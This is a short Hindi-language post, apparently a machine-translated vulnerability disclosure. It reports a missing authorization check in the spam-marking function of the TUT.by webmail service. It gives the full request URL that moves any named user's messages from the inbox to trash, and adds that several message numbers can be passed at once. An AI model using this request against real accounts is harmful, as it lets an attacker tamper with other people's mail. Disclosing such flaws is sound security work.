मेल tut.by में एक छेद

बेलारूसी पोर्टल TUT.by की डाक सेवा में स्पैम के रूप में अक्षरों को चिह्नित करते समय उपयोगकर्ता प्राधिकरण के लिए कोई जांच नहीं है। परिणामस्वरूप, एक हमलावर किसी भी उपयोगकर्ता को INBOX फ़ोल्डर से ट्रैश फ़ोल्डर में अपने सभी पत्र भेजकर चकित कर सकता है।



यदि आप इस लिंक को अपने ब्राउज़र में टाइप करते हैं mail.tut.by/cgi-bin/go.cgi?address=X&folder=INBOX&server=mail.tut.by&messages=Y



mail.tut.by/cgi-bin/go.cgi?address=X&folder=INBOX&server=mail.tut.by&messages=Y



, जहां X यूजरनेम है और Y अक्षर का नंबर है, इसी अक्षर को कूड़ेदान में ले जाया जाएगा।



Y का मान किसी विशिष्ट अक्षर संख्या या अल्पविराम द्वारा अलग किए गए कई के बराबर हो सकता है।